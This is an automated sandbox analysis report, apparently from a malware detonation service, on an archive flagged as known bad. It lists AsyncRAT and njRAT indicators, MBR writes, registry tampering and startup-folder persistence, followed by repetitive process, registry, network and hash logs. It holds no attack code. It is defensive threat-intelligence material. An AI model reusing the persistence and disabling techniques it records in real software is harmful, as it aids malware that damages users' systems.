Analysis Overview
SHA256
f715c3d3a93c1160c490ce9277c4d2093787f383e15d3e50d034bd9eaf36d536
Threat Level: Known bad
The file TrashMalwares-main.zip was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Njrat family
Asyncrat family
Possible privilege escalation attempt
Disables Task Manager via registry modification
Blocklisted process makes network request
Downloads MZ/PE file
Modifies Installed Components in the registry
Disables RegEdit via registry modification
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
UPX packed file
Drops startup file
Checks computer location settings
Deletes itself
Writes to the Master Boot Record (MBR)
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Program Files directory
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious behavior: CmdExeWriteProcessMemorySpam
Checks SCSI registry key(s)
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Modifies registry key
Delays execution with timeout.exe
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Runs regedit.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-02 20:28
Signatures
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Asyncrat family
Njrat family
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral17
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win7-20240221-en
Max time kernel
122s
Max time network
134s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe"
Network
Files
memory/2712-0-0x0000000000400000-0x000000000042F000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
96s
Max time network
156s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Program = "C:\\TEMP\\NetPakoe3.0.exe /autorun" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-983155329-280873152-1838004294-1000_Classes\Local Settings | C:\Windows\System32\calc.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wscript.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe3.0.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\A8F2.tmp\A8F3.tmp\A8F4.vbs //Nologo
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x494 0x504
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\System32\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\A8F2.tmp\A8F3.tmp\A8F4.vbs
| MD5 | 36072dc09cf0a99e3936b50bacd9a3e5 |
| SHA1 | 731ede51ad7869ae0b01248267b0354a5fe52cba |
| SHA256 | a8dd0c012506f5ec41f90909e88de316ce3cbdb294db2b925c832af104e8b94f |
| SHA512 | c4d9858e67295ef124218e2493e9990427df16bc722df621ffebbcc4229e270f42fbccd9a2376448c19319ab18c1982f6d9a7371a77c148d434a64b8fe0a874d |
Analysis: behavioral26
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
40s
Max time network
183s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
